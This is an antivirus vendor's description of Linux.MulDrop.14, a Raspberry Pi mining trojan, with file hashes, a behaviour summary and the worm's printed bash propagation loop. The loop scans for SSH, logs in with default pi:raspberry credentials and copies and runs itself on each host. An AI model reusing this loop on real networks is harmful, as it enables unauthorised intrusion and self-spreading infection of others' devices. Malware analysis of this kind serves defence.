Linux.MulDrop.14
| Added to Dr.Web virus database: | 2017-05-17 |
| Virus description was added: | 2017-06-06 |
SHA1:
- 00f4fd10d2eff990929e0850b61e23e1819a9ea4
- 185b5b2ad16b046eebd54b8b87b9e44e1b51dec9
- 2961159e48dfdb9ccca82f0053391c727c31b017
Linux Trojan that is a bash script containing a mining program, which is compressed with gzip and encrypted with base64. Once launched, the script shuts down several processes and installs libraries required for its operation. It also installs zmap and sshpass.
It changes the password of the user “pi” to “\$6\$U1Nu9qCp\$FhPuo8s5PsQlH6lwUdTwFcAUPNzmr0pWCdNJj.p6l4Mzi8S867YLmc7BspmEH95POvxPQ3PzP029yT1L3yi6K1”.
Then, in an infinite loop, using zmap, the Trojan searches for network nodes with an open port 22, after that it uses sshpass to log into them with the following login:password pair: pi:raspberry, and then—to save and run its copy.
NAME=`mktemp -u 'XXXXXXXX'`
while [ true ]; do
FILE=`mktemp`
zmap -p 22 -o $FILE -n 100000
killall ssh scp
for IP in `cat $FILE`
do
sshpass -praspberry scp -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $MYSELF pi@$IP:/tmp/$NAME && echo $IP >> /tmp/.r && sshpass -praspberry ssh pi@$IP -o ConnectTimeout=6 -o NumberOfPasswordPrompts=1 -o PreferredAuthentications=password -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no "cd /tmp && chmod +x $NAME && bash -c ./$NAME" &
done
rm -rf $FILE
sleep 10
doneBLOCK_RECOM_LINUX
![[Facebook]](social/facebook.png)
![[Twitter]](social/twitter.png)
![[Google+]](social/google_plus.png)
![[Xing]](social/xing.png)
![[You Tube]](social/youtube.png)
![[Instagram]](social/instagram.png)
![[Pinterest]](social/pinterest.png)
